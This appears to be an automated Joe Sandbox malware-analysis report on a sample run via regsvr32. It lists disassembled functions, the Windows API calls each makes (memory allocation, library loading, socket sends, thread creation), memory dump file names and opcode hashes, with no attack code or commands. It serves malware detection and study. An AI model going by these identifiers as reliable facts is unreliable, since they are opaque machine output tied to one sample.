Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CloseEnumInfoQueryValue_callnewhmallocstd::exception::exception
String ID:
API String ID: 1242514309-0
Opcode ID: 3305b858c53ab821ca1a14390b6984ca58f21078f84b97f883c0325d42e4eb17
Instruction ID: a4f15d530e429b36508bd2c04a166b9eee846b754c362e211f3b4a6c98d0a786
Opcode Fuzzy Hash: 3305b858c53ab821ca1a14390b6984ca58f21078f84b97f883c0325d42e4eb17
Instruction Fuzzy Hash: EE818B32751B808ADB00CF6AE89479D73E9F788BA8F419226EE5D87B64EF34C551C700

Function 02E4C570 Relevance: 4.5, APIs: 3, Instructions: 31COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 02E4C590
GdiplusStartup.GDIPLUS ref: 02E4C5CC
LeaveCriticalSection.KERNEL32 ref: 02E4C5E6

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CriticalSection$EnterGdiplusLeaveStartup
String ID:
API String ID: 389129658-0
Opcode ID: 95c4991dab0195ebe368ffd66680bcf302dcdb8c8965a393e09ff6184bfe9b5d
Instruction ID: ffed8f322e10b8c2df309aa7402224604dd3ede4f9079d3d4a5351a9bf4b43ad
Opcode Fuzzy Hash: 95c4991dab0195ebe368ffd66680bcf302dcdb8c8965a393e09ff6184bfe9b5d
Instruction Fuzzy Hash: 9C011936688BC6C2EB109F11F94839AB3B5F7A1758F842106E6CA43AA4DF7CC159CB00

Function 02D700DC Relevance: 3.4, APIs: 2, Instructions: 391memorylibraryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32 ref: 02D70157
LoadLibraryA.KERNEL32 ref: 02D702BD

Memory Dump Source

Source File: 00000005.00000002.2927463578.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d70000_regsvr32.jbxd

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: 22a59f860d870a6bcf201ec3191bb530606b5caa03c236b8628a20c22f198a64
Instruction ID: 89949764d7e9c3943acf54668169cc9d3b1b73a4f4b1ae7a9d8d7db67da49b30
Opcode Fuzzy Hash: 22a59f860d870a6bcf201ec3191bb530606b5caa03c236b8628a20c22f198a64
Instruction Fuzzy Hash: ADB19431614E0A8FDB28DE69C8856B5B3E0FB54316B15423DD88AC7791EB78EC92C7C1

Function 00007FFE0141B4B0 Relevance: 3.1, APIs: 2, Instructions: 103fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 00007FFE0141B528
GetLastError.KERNEL32 ref: 00007FFE0141B54B

Memory Dump Source

Source File: 00000005.00000002.2927951746.00007FFE013D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE013D0000, based on PE: true

Associated: 00000005.00000002.2927934110.00007FFE013D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2927993145.00007FFE01442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01443000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01470000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928054254.00007FFE01476000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928071715.00007FFE01477000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928088613.00007FFE01478000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928105686.00007FFE0147B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe013d0000_regsvr32.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 2226a3a8cdd80ab3fdccd84974f2e587e11cbe3bb2805e637b4f5eaf910a6f4a
Instruction ID: df4bafc062cc0e5e5e178c5c6e90de72f6cf695decf5896195661e0fbbe3cd7a
Opcode Fuzzy Hash: 2226a3a8cdd80ab3fdccd84974f2e587e11cbe3bb2805e637b4f5eaf910a6f4a
Instruction Fuzzy Hash: 6D415B62B08B4189EF248F66D5503BD23B1EB58B88F548835DE5D4BBE9DF7CE8518300

Function 02E466A0 Relevance: 3.1, APIs: 2, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 02E466FD
SysAllocString.OLEAUT32 ref: 02E46749

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 2ff8072f682cb467b12351a1f9e4afe1b1f9cbb5b4c9ea14b380adfe7e6cb5a0
Instruction ID: 192699124c2b3737d0aaf8f92a1ff945602a31e91503484b45c031109696202b
Opcode Fuzzy Hash: 2ff8072f682cb467b12351a1f9e4afe1b1f9cbb5b4c9ea14b380adfe7e6cb5a0
Instruction Fuzzy Hash: DA218031282B5183EF199F25F118328B268AF86BACF18D6298E690B794EF7CC4118710

Function 02E43A30 Relevance: 3.1, APIs: 2, Instructions: 66networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 02E43A93
send.WS2_32 ref: 02E43AE0

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 2e59fa7294a7467a9ddcbc0dceddb505d2c61d6133225b8cfaa6b415a71a6c04
Instruction ID: dbb23479c0662876c2ef1504dfd10c7c7dc5fc6ffca6530cb73a7546fa2c55b9
Opcode Fuzzy Hash: 2e59fa7294a7467a9ddcbc0dceddb505d2c61d6133225b8cfaa6b415a71a6c04
Instruction Fuzzy Hash: CF113B22784B9041D7209F66F84872A7754F788BDCF24B262EF5A83F50EFB4C4428700

Function 02878650 Relevance: 3.1, APIs: 2, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32 ref: 02878681
free.LIBCMT ref: 028786C4

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: CreateHeapfree
String ID:
API String ID: 2345683253-0
Opcode ID: 5d2529e43311571c4d53081da16a5924c6b544396f16fa9d2cc74c1f8e83265e
Instruction ID: c79bdff32f5e6bc3f4ee3f254c57f9d32250817a93fb2cc683ad0faf26bf7c47
Opcode Fuzzy Hash: 5d2529e43311571c4d53081da16a5924c6b544396f16fa9d2cc74c1f8e83265e
Instruction Fuzzy Hash: 6C1112B4928B298FDBA4DF19E4C83117BE8FB58714F60459EA90DCB21AC770C881CBC5

Function 02878580 Relevance: 3.0, APIs: 2, Instructions: 48threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageA.USER32 ref: 028785B2

Part of subcall function 028773D0: _wcsrev.LIBCMT ref: 02877411

CreateThread.KERNEL32 ref: 028785DE

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: Thread$CreateMessagePost_wcsrev
String ID:
API String ID: 4143106411-0
Opcode ID: 152ae417eb4b62f33c842a60702934fe7b1e65802cfc5c2bd98c8d5dbe26bc31
Instruction ID: d96d2a9ed2f4c4a091e93192685ba5f1b5aa99c4b4fffbcf36b3a712f0b10b4a
Opcode Fuzzy Hash: 152ae417eb4b62f33c842a60702934fe7b1e65802cfc5c2bd98c8d5dbe26bc31
Instruction Fuzzy Hash: DE0121707145058FE728EF75EC5D0397BE2FB89316B41863A9457C2DB0DF3C4401AA42

Function 02E4FF90 Relevance: 3.0, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32 ref: 02E4FFC1
free.LIBCMT ref: 02E50004

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CreateHeapfree
String ID:
API String ID: 2345683253-0
Opcode ID: f3c853349a5c59fd3449079867ad891792ce2dd8b9137124cb1d366ba339df00
Instruction ID: 6cfb86ee6ca5bd44e364f8fd4423e86bb5a0a5b318c4889160675fe6992ae63c
Opcode Fuzzy Hash: f3c853349a5c59fd3449079867ad891792ce2dd8b9137124cb1d366ba339df00
Instruction Fuzzy Hash: 63111BB25217608AEB54CF69E48031977B8F748F4CF25911AEB4957B58CB78C492CB84

Function 02873310 Relevance: 3.0, APIs: 2, Instructions: 39COMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 0287334D
closesocket.WS2_32 ref: 0287336A

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: closesocketsetsockopt
String ID:
API String ID: 553142124-0
Opcode ID: 77c2693313518921cd1b9c8efffd3d9e865a5c66b2e60eb56a87be25d9ebaed2
Instruction ID: 910e323d4daa8776be3de1b21976ded997d5479c2385cff88ddb9154c4ebd003
Opcode Fuzzy Hash: 77c2693313518921cd1b9c8efffd3d9e865a5c66b2e60eb56a87be25d9ebaed2
Instruction Fuzzy Hash: AA016D30218A058FD744DF68D848796B7B1FB88315F50432CE15DC72A0CB399851CB82

Function 02E437B0 Relevance: 3.0, APIs: 2, Instructions: 37sleeptimeCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 02E437DB
timeGetTime.WINMM ref: 02E437FF

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: SleepTimetime
String ID:
API String ID: 346578373-0
Opcode ID: a0bf3c937420c0917f34046eef8d55b82e3cbf61d4d324ed7221063299da0014
Instruction ID: fd6f67d90746e9022c2d5a3c0bf939e7e9dc5995fac24ce852263a3d3960cf0a
Opcode Fuzzy Hash: a0bf3c937420c0917f34046eef8d55b82e3cbf61d4d324ed7221063299da0014
Instruction Fuzzy Hash: 2D018F3271868487D7288B64F28832D7361F348B89F14A264DB5A03AD4CFB8C0A5C741

Function 0287940C Relevance: 3.0, APIs: 2, Instructions: 32threadCOMMON

Download Yara Rule

APIs

RtlExitUserThread.NTDLL(?,?,?,?,?,?,00000000,0287944E), ref: 02879428
_getptd.LIBCMT ref: 02879434

Part of subcall function 0287BB8C: _freefls.LIBCMT ref: 0287BBBF

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: ExitThreadUser_freefls_getptd
String ID:
API String ID: 228602417-0
Opcode ID: 547163f4070d09373063701e410eb860625b88fe0da63c6ec4e1739c39c02e3f
Instruction ID: e69905fb61e0ec98f88374f71f22393239f8867705bf798c92d90a9cfd0cac64
Opcode Fuzzy Hash: 547163f4070d09373063701e410eb860625b88fe0da63c6ec4e1739c39c02e3f
Instruction Fuzzy Hash: 27E04F2CB12A080BCE5C73BD58AC63D3297EB84209F4018B8941AC7291ED69C8548B42

Function 02E5569C Relevance: 3.0, APIs: 2, Instructions: 25threadCOMMON

Download Yara Rule

APIs

Part of subcall function 02E5DF0C: GetLastError.KERNEL32 ref: 02E5DF16
Part of subcall function 02E5DF0C: FlsGetValue.KERNEL32 ref: 02E5DF24
Part of subcall function 02E5DF0C: FlsSetValue.KERNEL32 ref: 02E5DF50
Part of subcall function 02E5DF0C: GetCurrentThreadId.KERNEL32 ref: 02E5DF64
Part of subcall function 02E5DF0C: SetLastError.KERNEL32 ref: 02E5DF7C

ExitThread.KERNEL32 ref: 02E556B8
_getptd.LIBCMT ref: 02E556C4

Part of subcall function 02E5E0E8: FlsGetValue.KERNEL32 ref: 02E5E101
Part of subcall function 02E5E0E8: FlsSetValue.KERNEL32 ref: 02E5E112
Part of subcall function 02E5E0E8: _freefls.LIBCMT ref: 02E5E11B

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Value$ErrorLastThread$CurrentExit_freefls_getptd
String ID:
API String ID: 3588098115-0
Opcode ID: 69fd6f60cbd72f61ca7718c2e2a29e064edf9474930f3cd69f06ff0a27feda29
Instruction ID: eb3541a564176fc0513a462fcb09865ef601014920cc035e56b255cc69bdb115
Opcode Fuzzy Hash: 69fd6f60cbd72f61ca7718c2e2a29e064edf9474930f3cd69f06ff0a27feda29
Instruction Fuzzy Hash: 80E0EC10FA229482DE1C77B2589932C13A2AB99B44F58F878AE0B57741EE3888598B11

Function 00007FFE0140E340 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32 ref: 00007FFE0140E367
GetLastError.KERNEL32 ref: 00007FFE0140E37C

Memory Dump Source

Source File: 00000005.00000002.2927951746.00007FFE013D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE013D0000, based on PE: true

Associated: 00000005.00000002.2927934110.00007FFE013D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2927993145.00007FFE01442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01443000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01470000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928054254.00007FFE01476000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928071715.00007FFE01477000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928088613.00007FFE01478000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928105686.00007FFE0147B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe013d0000_regsvr32.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 399503a04a190bd1bb0aabaca5cbfe31e1b7b0d87cba7a2b7bf6a5cddee4c230
Instruction ID: aeb19a95e5e7e565608e5ead8741a3fa0856a5d7b476d155844ad634b74b45e2
Opcode Fuzzy Hash: 399503a04a190bd1bb0aabaca5cbfe31e1b7b0d87cba7a2b7bf6a5cddee4c230
Instruction Fuzzy Hash: 3CE0EDA6F20A429AFB008BB2D0023E96760A708794F884421CE4C6B3B9DE3CD2E0C200

Function 02E51B50 Relevance: 3.0, APIs: 2, Instructions: 20synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 02E51B7B
WaitForSingleObject.KERNEL32 ref: 02E51B8E

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CreateObjectSingleThreadWait
String ID:
API String ID: 1891408510-0
Opcode ID: 91d2d110985bb54daf9c0b435a0f1d873197dfe1a6e7d7fc0f20f16f28882229
Instruction ID: ea6c5a49dc150adf85110088d45d8a403e897641e9f1f0022f3bdf53e9bccad4
Opcode Fuzzy Hash: 91d2d110985bb54daf9c0b435a0f1d873197dfe1a6e7d7fc0f20f16f28882229
Instruction Fuzzy Hash: 7EE04831D54EC081EB609B65FC1D39533E1F795358F505225D55E8A6A0FF3C8545C700

Function 00007FFE013EBBB0 Relevance: 2.7, APIs: 2, Instructions: 246memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FFE013EBE52
HeapFree.KERNEL32 ref: 00007FFE013EBE63

Memory Dump Source

Source File: 00000005.00000002.2927951746.00007FFE013D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE013D0000, based on PE: true

Associated: 00000005.00000002.2927934110.00007FFE013D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2927993145.00007FFE01442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01443000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01470000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928054254.00007FFE01476000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928071715.00007FFE01477000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928088613.00007FFE01478000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928105686.00007FFE0147B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe013d0000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 322ddf701f8e41fff6379dea25fe02a973c4d35842ec94fb84da0069814e9fc6
Instruction ID: 1bb6382d45c43691fb1f979c7babfe4177d6ddc23b6ba58e20d4094c76aa7cc3
Opcode Fuzzy Hash: 322ddf701f8e41fff6379dea25fe02a973c4d35842ec94fb84da0069814e9fc6
Instruction Fuzzy Hash: 7C81D612F0D78681FB168B16A9103B996E1AF94BD4F5A8431DE0D4F7F9DE3CE5868300

Function 02871080 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32 ref: 028710F8
VirtualFree.KERNELBASE ref: 02871133

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 2484a8c24aacdb5181f666071a22870bdde20e6a68149a2190386918f630d443
Instruction ID: a7a4eff40017d42fc73c883c507e61e6bcb07b3994752dc29047ab74dec3f0a0
Opcode Fuzzy Hash: 2484a8c24aacdb5181f666071a22870bdde20e6a68149a2190386918f630d443
Instruction Fuzzy Hash: 97410834718B484B8B1CDE1CD896535B7D2FBC9315B1483AEE89EC764ADB30D852CB81

Function 028711F0 Relevance: 2.6, APIs: 2, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32 ref: 02871261
VirtualFree.KERNELBASE ref: 02871295

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 934c61882530ec617f1397abced9c4cebe760296fae60a1bd20dee382fa532e9
Instruction ID: 6a3a1324893d923fd6dea635106dab494214cdfed1c49a9da2e53777e7c4f835
Opcode Fuzzy Hash: 934c61882530ec617f1397abced9c4cebe760296fae60a1bd20dee382fa532e9
Instruction Fuzzy Hash: 94216234618E098FDB84EF6DE448625B7E1FBA8311B54866EE45DC3614DB35DCC2CB81

Function 02E41140 Relevance: 2.6, APIs: 2, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32 ref: 02E411B1
VirtualFree.KERNEL32 ref: 02E411E5

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 530910900c37fe9613c3ff3dda4de058dcfccbb59fe36364dc77c55757d465c3
Instruction ID: 588a263a79012b3151eb6e11e5ccd8590e11960f4aa0b7a5b2d46f4d84f76a78
Opcode Fuzzy Hash: 530910900c37fe9613c3ff3dda4de058dcfccbb59fe36364dc77c55757d465c3
Instruction Fuzzy Hash: 6B21A132764A908BCB45CB2AF544319B3A1F789BC4F549525EB5A97B08EF34D8E28B40

Function 00007FFE013EBC35 Relevance: 2.6, APIs: 2, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2927951746.00007FFE013D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE013D0000, based on PE: true

Associated: 00000005.00000002.2927934110.00007FFE013D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2927993145.00007FFE01442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01443000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01470000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928054254.00007FFE01476000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928071715.00007FFE01477000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928088613.00007FFE01478000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928105686.00007FFE0147B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe013d0000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f861fd04a91acae02b56f211ce194db17c428f34d9c6967d206541d61889b378
Instruction ID: d708e69508616b81b27342b6ef9e0e1225c9ed3817ca91411eaa0d4552c83cee
Opcode Fuzzy Hash: f861fd04a91acae02b56f211ce194db17c428f34d9c6967d206541d61889b378
Instruction Fuzzy Hash: F1119D52B0DB4681EF2ADB06A4193B992D1BF95B90F8A8531DA0D4F6FDCE3CE5918200

Function 02E41080 Relevance: 2.6, APIs: 2, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32 ref: 02E410D3
VirtualFree.KERNEL32 ref: 02E4110C

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: e37b62da0ecbe8d6c4feb3876bb8c88a6cb38d412b61bd74b990c88d492ffce2
Instruction ID: 6f2ba5c23e2718fbd71868d3dc46318fe5aa87e18e875d9560e42cb5e21bf335
Opcode Fuzzy Hash: e37b62da0ecbe8d6c4feb3876bb8c88a6cb38d412b61bd74b990c88d492ffce2
Instruction Fuzzy Hash: 6A11B231724B8086DB19CF36F544719B3A5EB84BC4F18E125EA4A97B58EF38C8D1CB40

Function 00007FFE013EBBDE Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FFE013EBBEA
HeapFree.KERNEL32 ref: 00007FFE013EBBFB
HeapFree.KERNEL32 ref: 00007FFE013EBE52
HeapFree.KERNEL32 ref: 00007FFE013EBE63

Memory Dump Source

Source File: 00000005.00000002.2927951746.00007FFE013D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE013D0000, based on PE: true

Associated: 00000005.00000002.2927934110.00007FFE013D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2927993145.00007FFE01442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01443000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01470000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928054254.00007FFE01476000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928071715.00007FFE01477000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928088613.00007FFE01478000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928105686.00007FFE0147B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe013d0000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 283917e939114c9ea4e969287793e5911e7826ea4b28176277fceb9dbe71ffba
Instruction ID: 060eee6c9199e075c5fe6215e36214be3f2b26b0c49fb5faade672b16583d427
Opcode Fuzzy Hash: 283917e939114c9ea4e969287793e5911e7826ea4b28176277fceb9dbe71ffba
Instruction Fuzzy Hash: AFE09250F0DB8241FF06DB5A94152B987D2BFD9B80B8A8530EA0D9E2BBCE7CE1408240

Function 02873B10 Relevance: 1.6, APIs: 1, Instructions: 101networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 02873BC0

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 993fe9fb8bd5cda1ffd7d49de116850fd78509aad300088003f3a940471f662b
Instruction ID: 948ad358acb18b49eb11df4cd99a16e262080bab2376f73181e7007ed8ef2642
Opcode Fuzzy Hash: 993fe9fb8bd5cda1ffd7d49de116850fd78509aad300088003f3a940471f662b
Instruction Fuzzy Hash: 5E21B63850CB484FD768AA2C988677A72D0F785318F15127DD99EC3262EB70D85356C7

Function 028737E0 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 0287380B

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 88df6c9814dd7951e769eaa4fec861968935f3fc4ebb5d812e480bd371ef65fc
Instruction ID: a0fe48fd8432e5d4ba1e8804061f0b72e963d0094d32bf7aeb202cddd74385c9
Opcode Fuzzy Hash: 88df6c9814dd7951e769eaa4fec861968935f3fc4ebb5d812e480bd371ef65fc
Instruction Fuzzy Hash: 50015E346146499FD758DB6CD088768B7E1FB48305F4416ADE05EC2191CB74D895C743

Function 02873C10 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 02873C2B

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: bc31317e1241cbe88b87a2fddbfd8f69b2015d3f2dce8f37f5b894eda6bc4ee3
Instruction ID: 10b42ba17488e3b414c7864365416a4ecbdd30ee14c620697ce26bd59c9482f1
Opcode Fuzzy Hash: bc31317e1241cbe88b87a2fddbfd8f69b2015d3f2dce8f37f5b894eda6bc4ee3
